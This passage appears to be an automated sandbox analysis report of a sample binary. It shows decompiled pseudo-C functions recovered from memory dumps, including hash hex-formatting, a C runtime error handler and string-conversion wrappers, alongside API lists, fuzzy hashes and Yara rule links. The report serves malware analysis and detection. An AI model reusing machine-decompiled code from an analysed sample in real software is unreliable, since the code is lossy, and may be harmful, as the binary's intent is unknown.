                                                                                                                                                      0x10021208
                                                                                                                                                      0x10021222
                                                                                                                                                      0x10021225
                                                                                                                                                      0x10021230
                                                                                                                                                      0x10021235
                                                                                                                                                      0x1002123a
                                                                                                                                                      0x1002125c
                                                                                                                                                      0x10021268
                                                                                                                                                      0x1002126e
                                                                                                                                                      0x1002123c
                                                                                                                                                      0x1002123f
                                                                                                                                                      0x1002124b
                                                                                                                                                      0x10021251
                                                                                                                                                      0x10021251
                                                                                                                                                      0x1002127d
                                                                                                                                                      0x10021282
                                                                                                                                                      0x10021285
                                                                                                                                                      0x1002128c
                                                                                                                                                      0x100212a0
                                                                                                                                                      0x100212a5
                                                                                                                                                      0x100212ab
                                                                                                                                                      0x1002128e
                                                                                                                                                      0x10021297
                                                                                                                                                      0x10021297
                                                                                                                                                      0x100212bd
                                                                                                                                                      0x100212cb
                                                                                                                                                      0x100212e4
                                                                                                                                                      0x100212fd
                                                                                                                                                      0x10021304
                                                                                                                                                      0x10021359
                                                                                                                                                      0x1002136f
                                                                                                                                                      0x1002137d
                                                                                                                                                      0x10021390
                                                                                                                                                      0x10021306
                                                                                                                                                      0x1002131d
                                                                                                                                                      0x1002132f
                                                                                                                                                      0x1002133d
                                                                                                                                                      0x1002134f
                                                                                                                                                      0x10021354
                                                                                                                                                      0x100213ab
                                                                                                                                                      0x100213b2
                                                                                                                                                      0x100213fe
                                                                                                                                                      0x1002140f
                                                                                                                                                      0x100213b4
                                                                                                                                                      0x100213bf
                                                                                                                                                      0x100213c8
                                                                                                                                                      0x100213db
                                                                                                                                                      0x100213df
                                                                                                                                                      0x100213f4
                                                                                                                                                      0x100213f9
                                                                                                                                                      0x10021421
                                                                                                                                                      0x1002142f
                                                                                                                                                      0x1002144a
                                                                                                                                                      0x10021452
                                                                                                                                                      0x1002120a
                                                                                                                                                      0x10021212
                                                                                                                                                      0x10021217
                                                                                                                                                      0x1002121c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1002121c
                                                                                                                                                      0x1002145f

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3056589307-0
                                                                                                                                                      • Opcode ID: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                      • Instruction ID: b73e38e492334931c567e70ec6057ca77ce0bc3bbcd211be2433ac406d63848b
                                                                                                                                                      • Opcode Fuzzy Hash: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                      • Instruction Fuzzy Hash: E3911BB9E00209EFDB00CFA4D991EAFB7B5FF48344F104568F905AB345E635AA14CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A480, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E1001A480(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				signed int _v8;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebp;
				void* _t36;
				void* _t75;
				void* _t80;
				void* _t81;

				_t74 = __esi;
				_t73 = __edi;
				_t57 = __ebx;
				_v8 = 0;
				_v176 = L1000CE56(__ebx, __edx, __edi, __esi, 0x10);
				_v168 = L1000CE56(__ebx, __edx, __edi, __esi, 0x21);
				E1000CF20(__edi, _v168, 0, 0x21);
				E1000CF20(_t73, _v176, 0, 0x10);
				_t67 = _a4;
				_t36 = E1000CAC0(_a4);
				_t80 = _t75 + 0x24;
				if(_t36 <= 0) {
					E1000E280(_v168, "00000000000000000000000000000000");
					_t81 = _t80 + 8;
				} else {
					E1001BC10( &_v164);
					E1001CAC0( &_v164, _a4, E1000CAC0(_a4));
					_t67 =  &_v164;
					E1001CBC0( &_v164, _v176);
					_t81 = _t80 + 0x1c;
					_v8 = 0;
					while(_v8 < 0x10) {
						_t67 = _v168 + _v8 * 2;
						E1000CC93(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
						_t81 = _t81 + 0xc;
						_v8 = _v8 + 1;
					}
				}
				_push(_v176);
				E1000CA30(_t57, _t73, _t74, __eflags);
				_v172 = L1000CE56(_t57, _t67, _t73, _t74, 0x11);
				E1000CF20(_t73, _v172, 0, 0x11);
				__eflags = _v168 + 8;
				E1000D190(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
				_push(_v168);
				E1000CA30(_t57, _t73, _t74, __eflags);
				return _v172;
			}













                                                                                                                                                      0x1001a480
                                                                                                                                                      0x1001a480
                                                                                                                                                      0x1001a480
                                                                                                                                                      0x1001a489
                                                                                                                                                      0x1001a49a
                                                                                                                                                      0x1001a4aa
                                                                                                                                                      0x1001a4bb
                                                                                                                                                      0x1001a4ce
                                                                                                                                                      0x1001a4d6
                                                                                                                                                      0x1001a4da
                                                                                                                                                      0x1001a4df
                                                                                                                                                      0x1001a4e4
                                                                                                                                                      0x1001a584
                                                                                                                                                      0x1001a589
                                                                                                                                                      0x1001a4ea
                                                                                                                                                      0x1001a4f1
                                                                                                                                                      0x1001a511
                                                                                                                                                      0x1001a520
                                                                                                                                                      0x1001a527
                                                                                                                                                      0x1001a52c
                                                                                                                                                      0x1001a52f
                                                                                                                                                      0x1001a541
                                                                                                                                                      0x1001a568
                                                                                                                                                      0x1001a56c
                                                                                                                                                      0x1001a571
                                                                                                                                                      0x1001a53e
                                                                                                                                                      0x1001a53e
                                                                                                                                                      0x1001a576
                                                                                                                                                      0x1001a592
                                                                                                                                                      0x1001a593
                                                                                                                                                      0x1001a5a5
                                                                                                                                                      0x1001a5b6
                                                                                                                                                      0x1001a5c6
                                                                                                                                                      0x1001a5d1
                                                                                                                                                      0x1001a5df
                                                                                                                                                      0x1001a5e0
                                                                                                                                                      0x1001a5f1

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                      • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                      • API String ID: 796335831-606320477
                                                                                                                                                      • Opcode ID: 4f94a37edf8ada489d5e5f705fb36280af0f4c8441c331aff08983eb81f312ee
                                                                                                                                                      • Instruction ID: 5f34500701607727b308b008c02476916cf30523b6eb1de7e1c0da2fd1923ee1
                                                                                                                                                      • Opcode Fuzzy Hash: 4f94a37edf8ada489d5e5f705fb36280af0f4c8441c331aff08983eb81f312ee
                                                                                                                                                      • Instruction Fuzzy Hash: 6D3162BAE0030CABEB10DB60DC42FAE7375DF46344F0444A4F9496B246E671EB949B93
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406C60, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E00406C60(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x40fa00;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x40fa90) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x40fa00; // 0x58000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x41079c; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x40d608 == 1) {
						_t16 = _t54 + 0x40fa04; // 0x40b658
						_t56 = _t16;
						_t19 = E00407250( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00407BD0( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00407250( &_v424) + 1 > 0x3c) {
								_t49 = E00407250( &_v424) +  &_v424 - 0x3b;
								E004037A0(E00407250( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00407BD0( &_v164, "Runtime Error!\n\nProgram: ");
							E00407BE0( &_v164, _t49);
							E00407BE0( &_v164, "\n\n");
							_t12 = _t54 + 0x40fa04; // 0x40b658
							E00407BE0( &_v164,  *_t12);
							_t17 = E00408D68( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













                                                                                                                                                      0x00406c60
                                                                                                                                                      0x00406c69
                                                                                                                                                      0x00406c6c
                                                                                                                                                      0x00406c6e
                                                                                                                                                      0x00406c73
                                                                                                                                                      0x00406c77
                                                                                                                                                      0x00406c7a
                                                                                                                                                      0x00406c80
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406c80
                                                                                                                                                      0x00406c85
                                                                                                                                                      0x00406c88
                                                                                                                                                      0x00406c8e
                                                                                                                                                      0x00406c94
                                                                                                                                                      0x00406c9c
                                                                                                                                                      0x00406d8d
                                                                                                                                                      0x00406d8d
                                                                                                                                                      0x00406d98
                                                                                                                                                      0x00406daa
                                                                                                                                                      0x00406cb3
                                                                                                                                                      0x00406cb9
                                                                                                                                                      0x00406cd5
                                                                                                                                                      0x00406ce3
                                                                                                                                                      0x00406ce9
                                                                                                                                                      0x00406cf0
                                                                                                                                                      0x00406cf2
                                                                                                                                                      0x00406d02
                                                                                                                                                      0x00406d1d
                                                                                                                                                      0x00406d25
                                                                                                                                                      0x00406d2a
                                                                                                                                                      0x00406d2a
                                                                                                                                                      0x00406d39
                                                                                                                                                      0x00406d46
                                                                                                                                                      0x00406d57
                                                                                                                                                      0x00406d5c
                                                                                                                                                      0x00406d69
                                                                                                                                                      0x00406d7f
                                                                                                                                                      0x00406d87
                                                                                                                                                      0x00406cb9
                                                                                                                                                      0x00406c9c
                                                                                                                                                      0x00406db2

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406CCD
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,0040B658,00000000,?,00000000), ref: 00406DA3
                                                                                                                                                      • WriteFile.KERNEL32(00000000), ref: 00406DAA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                                                                                      • String ID: ...$<program name unknown>$@A$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                      • API String ID: 3784150691-1647693526
                                                                                                                                                      • Opcode ID: ec561903232ed76a8b5bce49d3094f78bc323a5fdecae60dbafb6eb8c7232f38
                                                                                                                                                      • Instruction ID: 0fb857b455d91a1aa3564d0dd8ff5f06dc914241668c5633d898896f2947ee2a
                                                                                                                                                      • Opcode Fuzzy Hash: ec561903232ed76a8b5bce49d3094f78bc323a5fdecae60dbafb6eb8c7232f38
                                                                                                                                                      • Instruction Fuzzy Hash: 59319472B04218AEEF30EA60DD45FDA776CEF45304F10047BF549B61C0D678EA548A5E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004081AA, Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 61%
                                                                                                                                                      			E004081AA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x40b6f0);
				_push(E00405E4C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x4109f0; // 0x0
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E004083CE(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x4109f0; // 0x0
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x410818; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E004038A0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E004038A0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x40b6e8, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x40b6e4, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x4109f0 = 2;
							goto L5;
						}
					} else {
						 *0x4109f0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























                                                                                                                                                      0x004081ad
                                                                                                                                                      0x004081af
                                                                                                                                                      0x004081b4
                                                                                                                                                      0x004081bf
                                                                                                                                                      0x004081c0
                                                                                                                                                      0x004081c7
                                                                                                                                                      0x004081cd
                                                                                                                                                      0x004081d2
                                                                                                                                                      0x004081d8
                                                                                                                                                      0x00408220
                                                                                                                                                      0x00408223
                                                                                                                                                      0x0040822b
                                                                                                                                                      0x00408231
                                                                                                                                                      0x00408232
                                                                                                                                                      0x00408232
                                                                                                                                                      0x00408235
                                                                                                                                                      0x0040823d
                                                                                                                                                      0x0040825f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408265
                                                                                                                                                      0x00408268
                                                                                                                                                      0x0040826a
                                                                                                                                                      0x0040826f
                                                                                                                                                      0x0040826f
                                                                                                                                                      0x0040827f
                                                                                                                                                      0x0040828f
                                                                                                                                                      0x00408291
                                                                                                                                                      0x00408296
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040829c
                                                                                                                                                      0x0040829c
                                                                                                                                                      0x004082a7
                                                                                                                                                      0x004082ac
                                                                                                                                                      0x004082b1
                                                                                                                                                      0x004082b4
                                                                                                                                                      0x004082d0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004082eb
                                                                                                                                                      0x004082fd
                                                                                                                                                      0x004082ff
                                                                                                                                                      0x00408304
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408306
                                                                                                                                                      0x0040830a
                                                                                                                                                      0x0040834c
                                                                                                                                                      0x0040835b
                                                                                                                                                      0x00408360
                                                                                                                                                      0x00408363
                                                                                                                                                      0x00408365
                                                                                                                                                      0x00408368
                                                                                                                                                      0x00408382
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040839c
                                                                                                                                                      0x0040839f
                                                                                                                                                      0x004083a0
                                                                                                                                                      0x004083a1
                                                                                                                                                      0x004083a7
                                                                                                                                                      0x004083aa
                                                                                                                                                      0x004083a3
                                                                                                                                                      0x004083a3
                                                                                                                                                      0x004083a4
                                                                                                                                                      0x004083a4
                                                                                                                                                      0x004083bd
                                                                                                                                                      0x004083c1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004083c1
                                                                                                                                                      0x0040830c
                                                                                                                                                      0x0040830f
                                                                                                                                                      0x004083c7
                                                                                                                                                      0x004083c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040830f
                                                                                                                                                      0x0040830a
                                                                                                                                                      0x00408304
                                                                                                                                                      0x004082d0
                                                                                                                                                      0x00408296
                                                                                                                                                      0x0040823f
                                                                                                                                                      0x00408251
                                                                                                                                                      0x00408251
                                                                                                                                                      0x004081da
                                                                                                                                                      0x004081da
                                                                                                                                                      0x004081db
                                                                                                                                                      0x004081de
                                                                                                                                                      0x004081f4
                                                                                                                                                      0x00408210
                                                                                                                                                      0x00408338
                                                                                                                                                      0x00408338
                                                                                                                                                      0x00408216
                                                                                                                                                      0x00408216
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408216
                                                                                                                                                      0x004081f6
                                                                                                                                                      0x004081f6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004081f6
                                                                                                                                                      0x004081f4
                                                                                                                                                      0x00408340
                                                                                                                                                      0x0040834b

                                                                                                                                                      APIs
                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,0040B6E8,00000001,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004081EC
                                                                                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,0040B6E4,00000001,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408208
                                                                                                                                                      • LCMapStringA.KERNEL32(00000000,?,00000100,00000020,00000001,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408251
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408289
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000100,00000020,00000100,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004082E1
                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004082F7
                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000100,00000000,00000001,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 0040832A
                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000100,00000000,?,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408392
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$ByteCharMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 352835431-0
                                                                                                                                                      • Opcode ID: 0059dfa9e69d9a54c9fa06535160f9e4815a5f92d159834d479f4c8b58195077
                                                                                                                                                      • Instruction ID: 6ff6068f324a42b5108f94410a9797b454fcd57a7a566a74789c166c11932f20
                                                                                                                                                      • Opcode Fuzzy Hash: 0059dfa9e69d9a54c9fa06535160f9e4815a5f92d159834d479f4c8b58195077
                                                                                                                                                      • Instruction Fuzzy Hash: 76517C71500609EBCF218F54CE45AEF7FB9FB89B50F10413AF950B12A0D73A8951DBA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1002185A, Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E1002185A(void* __ebx, void* __edx, void* __edi) {
				void* _t60;
				void* _t80;
				void* _t101;
				void* _t154;
				void* _t156;
				void* _t158;
				void* _t171;

				L0:
				while(1) {
					L0:
					_t150 = __edi;
					_t106 = __ebx;
					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
					_t60 = E100021E0(_t154 - 0xe2a4);
					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
						break;
					}
					L2:
					E1000CF20(__edi, _t154 - 0xab84, 0, 0x3710);
					E1000CF20(_t150, _t154 - 0x3d54, 0, 0x3710);
					_t80 = E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
					_t151 = _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
					E1000D190(__ebx, _t150, _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
					E1000D8A3( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
					E1000CF20(_t150, _t154 - 0xe294, 0, 0x3710);
					E1000CF20(_t150, _t154 - 0x746c, 0, 0x3710);
					E1000CC93(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
					_push(_t154 - 0x3d54);
					_push(_t154 - 0xe294);
					_push( *((intOrPtr*)(_t154 + 8)));
					E1000CC93(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
					_t171 = _t156 + 0x7c;
					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
						E1000D190(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAC0(_t154 - 0x746c));
						_t171 = _t171 + 0x10;
					}
					_t101 = E1000CAC0(_t154 - 0x746c);
					_t156 = _t171 + 4;
					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
				}
				L5:
				 *((char*)(_t154 - 4)) = 1;
				E100011A0(_t154 - 0xe2dc);
				 *((char*)(_t154 - 4)) = 0;
				E10003010(_t154 - 0xe2a4);
				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
				E100011A0(_t154 - 0xe2c0);
				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
				 *((char*)(_t154 - 0x21c)) = 0;
				E1000CF20(__edi, _t154 - 0x21b, 0, 0x1ff);
				_push( *((intOrPtr*)(_t154 - 0x18)));
				_push( *((intOrPtr*)(_t154 + 8)));
				E1000CC93(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
				_t158 = _t156 + 0x20;
				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
					E1000D190(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAC0(_t154 - 0x21c));
					_t158 = _t158 + 0x10;
				}
				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAC0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
				return  *((intOrPtr*)(_t154 - 0x14));
			}










                                                                                                                                                      0x1002185a
                                                                                                                                                      0x1002185a
                                                                                                                                                      0x1002185a
                                                                                                                                                      0x1002185a
                                                                                                                                                      0x1002185a
                                                                                                                                                      0x10021863
                                                                                                                                                      0x1002186f
                                                                                                                                                      0x10021874
                                                                                                                                                      0x1002187a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10021880
                                                                                                                                                      0x1002188e
                                                                                                                                                      0x100218a4
                                                                                                                                                      0x100218cb
                                                                                                                                                      0x100218ee
                                                                                                                                                      0x10021912
                                                                                                                                                      0x10021951
                                                                                                                                                      0x10021967
                                                                                                                                                      0x1002197d
                                                                                                                                                      0x1002199a
                                                                                                                                                      0x100219a8
                                                                                                                                                      0x100219af
                                                                                                                                                      0x100219b3
                                                                                                                                                      0x100219c6
                                                                                                                                                      0x100219cb
                                                                                                                                                      0x100219d4
                                                                                                                                                      0x100219f6
                                                                                                                                                      0x100219fb
                                                                                                                                                      0x100219fb
                                                                                                                                                      0x10021a05
                                                                                                                                                      0x10021a0a
                                                                                                                                                      0x10021a10
                                                                                                                                                      0x10021a10
                                                                                                                                                      0x10021a18
                                                                                                                                                      0x10021a18
                                                                                                                                                      0x10021a22
                                                                                                                                                      0x10021a27
                                                                                                                                                      0x10021a31
                                                                                                                                                      0x10021a36
                                                                                                                                                      0x10021a43
                                                                                                                                                      0x10021a48
                                                                                                                                                      0x10021a4f
                                                                                                                                                      0x10021a64
                                                                                                                                                      0x10021a6f
                                                                                                                                                      0x10021a73
                                                                                                                                                      0x10021a83
                                                                                                                                                      0x10021a88
                                                                                                                                                      0x10021a91
                                                                                                                                                      0x10021ab3
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021acd
                                                                                                                                                      0x10021ad6
                                                                                                                                                      0x10021ae1

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
